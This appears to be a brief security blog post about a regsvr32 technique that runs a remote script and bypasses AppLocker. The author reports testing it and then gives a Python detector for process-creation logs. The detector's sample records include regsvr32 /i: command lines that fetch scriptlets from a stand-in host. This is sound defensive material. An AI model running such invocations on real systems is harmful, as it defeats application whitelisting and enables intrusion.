Regsvr32 running a remote script, bypassing AppLocker

So Alex Ionescu posted this morning about remote execution via regsvr32.

I tested the POC and what do you know… it WORKS!

First off – running Alex’s script does give me a command prompt.

Now I tried this on a guest account, and same results – I get a command prompt.

So next step – try to run something that requires privilege.


OK, OK, some sanity has returned: by default it runs unprivileged. BUT I can run a whitelisted app from the command prompt: CALC.exe, WORD.exe.

Hmmmm… this is dangerous, and my mind is blown at what pivots I can use to escalate privilege.
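Because regsvr32 is a signed Microsoft binary under the Windows folder, default AppLocker rules let it run, so the practical control is to see the invocation in process-creation telemetry. The detector below is an added example, not code from this post or from Alex’s script: it runs over constructed process-creation records (the field names and the sample command lines are assumptions) and flags regsvr32 command lines whose /i: argument is a URL or whose target DLL is scrobj.dll.

```python
import re

# Constructed process-creation records standing in for parsed Sysmon Event ID 1
# or Security 4688 entries; made-up samples, not captured telemetry.
SAMPLE_EVENTS = [
    {"user": r"CORP\guest", "cmd": r'"C:\Windows\System32\regsvr32.exe" /s /i:http://constructed.invalid/x.sct scrobj.dll'},
    {"user": r"CORP\alice", "cmd": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"user": r"CORP\bob",   "cmd": r'REGSVR32 /s /N /I:"HTTPS://constructed.invalid/y.sct" SCROBJ.DLL'},
    {"user": r"CORP\carol", "cmd": r'C:\Windows\SysWOW64\regsvr32.exe /u /s C:\Temp\legacy.ocx'},
    {"user": r"CORP\dave",  "cmd": r'notepad.exe C:\Users\dave\notes.txt'},
]

REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

def tokenize(cmd):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]

def basename(path):
    """Last path component for either separator, lower-cased for comparison."""
    return re.split(r"[\\/]", path)[-1].lower()

def analyze(cmd):
    """Return the reasons a regsvr32 command line looks like a remote scriptlet load; [] means not flagged."""
    toks = tokenize(cmd)
    if not toks or basename(toks[0]) not in ("regsvr32", "regsvr32.exe"):
        return []
    reasons = []
    for tok in toks[1:]:
        if tok[:3].lower() in ("/i:", "-i:"):
            # /i:<arg> is handed to DllInstall; a URL here means the "install string" is fetched over the network.
            arg = tok[3:].strip('"')
            if REMOTE_SCHEME.match(arg):
                reasons.append(f"/i: points at a remote resource: {arg}")
        elif basename(tok) == "scrobj.dll":
            # scrobj.dll is the Windows script component runtime; registering it is rare in normal administration.
            reasons.append("target DLL is scrobj.dll")
    return reasons

def scan(events):
    """Run analyze() over parsed events; return only hits as (user, command line, reasons) for a SIEM rule to act on."""
    return [(e["user"], e["cmd"], r) for e in events if (r := analyze(e["cmd"]))]

if __name__ == "__main__":
    for user, cmd, reasons in scan(SAMPLE_EVENTS):
        print(f"{user}: {cmd}\n  " + "\n  ".join(reasons))
```

Running it flags only the guest and bob records; the ordinary DLL and OCX registrations pass, which is the false-positive behaviour you want before wiring this into an alert.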

Stay safe, and BIG thanks to Alex Ionescu for finding this!!!